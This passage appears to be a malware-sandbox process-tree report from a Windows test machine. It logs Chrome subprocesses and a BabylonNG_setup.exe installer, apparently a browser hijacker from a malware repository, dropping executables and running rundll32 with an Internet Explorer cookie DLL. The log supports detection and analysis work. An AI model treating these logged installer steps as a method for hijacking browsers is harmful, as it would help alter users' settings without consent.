  - C:\Windows\system32\WerFault.exe
    cmd: C:\Windows\system32\WerFault.exe -u -p 3760 -s 956
    signatures: Suspicious use of NtSetInformationThreadHideFromDebugger; Program crash
- C:\Windows\System32\RuntimeBroker.exe
  cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
- c:\windows\system32\sihost.exe
  cmd: sihost.exe
- C:\Program Files\Google\Chrome\Application\chrome.exe
  cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/channel/UCn2OJocEFxegDrjKZMIfnLw
  signatures: Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff825464f50,0x7ff825464f60,0x7ff825464f70
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1912 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2300 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1548 /prefetch:2
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2928 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2920 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4128 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4132 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4336 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4732 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4892 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5152 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4960 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3176 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3384 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5084 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3208 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3632 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5616 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3408 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2952 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4328 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3184 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4328 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4624 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4664 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2600 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3056 /prefetch:8
    signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5712 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4252 /prefetch:2
    signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5756 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=980 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4916 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3228 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5980 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6136 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5564 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4708 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6232 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3216 /prefetch:8
  - C:\Users\Admin\Downloads\BabylonNG_setup.exe
    cmd: "C:\Users\Admin\Downloads\BabylonNG_setup.exe"
    signatures: Executes dropped EXE; Suspicious use of SetWindowsHookEx
    - C:\Users\Admin\AppData\Local\Temp\{40D4E674-BAB0-7891-A712-46E157A567CB}\setup.exe
      cmd: "C:\Users\Admin\AppData\Local\Temp\{40D4E674-BAB0-7891-A712-46E157A567CB}\setup.exe"
      signatures: Executes dropped EXE; Loads dropped DLL; Checks whether UAC is enabled; Modifies Internet Explorer settings; Suspicious use of SetWindowsHookEx
      - C:\Windows\SysWOW64\rundll32.exe
        cmd: "C:\Windows\SysWOW64\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\{40D4E~1\IECOOK~1.DLL,UpdateProtectedModeCookieCache affilID|http://babylon-software.com
        signatures: Loads dropped DLL; Checks whether UAC is enabled; Modifies Internet Explorer settings
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4648 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1424 /prefetch:8
  - C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\96.276.200\software_reporter_tool.exe
    cmd: "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\96.276.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=fZSaUCEu784keatWCZZvaGTn9eBU/0cIvEX6GkU8 --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment
    signatures: Executes dropped EXE
    - \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\96.276.200\software_reporter_tool.exe
      cmd: "c:\users\admin\appdata\local\google\chrome\user data\swreporter\96.276.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=96.276.200 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff7282cf510,0x7ff7282cf520,0x7ff7282cf530
      signatures: Executes dropped EXE
    - \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\96.276.200\software_reporter_tool.exe
      cmd: "c:\users\admin\appdata\local\google\chrome\user data\swreporter\96.276.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_6760_NSRNLRYVPSUTSWNL" --sandboxed-process-id=2 --init-done-notifier=720 --sandbox-mojo-pipe-token=14105821477355650308 --mojo-platform-channel-handle=696 --engine=2
      signatures: Executes dropped EXE; Loads dropped DLL
    - \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\96.276.200\software_reporter_tool.exe
      cmd: "c:\users\admin\appdata\local\google\chrome\user data\swreporter\96.276.200\software_reporter_tool.exe" --enable-crash-reporting --use-crash-handler-with-id="\\.\pipe\crashpad_6760_NSRNLRYVPSUTSWNL" --sandboxed-process-id=3 --init-done-notifier=928 --sandbox-mojo-pipe-token=9254977436313870059 --mojo-platform-channel-handle=924
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,109700835265554376,11845683449642389059,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:82⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Browser Hijackers\BabylonToolbar.txt1⤵
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Browser Hijackers\BabylonToolbar.txt1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff825464f50,0x7ff825464f60,0x7ff825464f702⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4324.0.390697247\1251885658" -parentBuildID 20200403170909 -prefsHandle 1560 -prefMapHandle 1552 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4324 "\\.\pipe\gecko-crash-server-pipe.4324" 1652 gpu3⤵
-
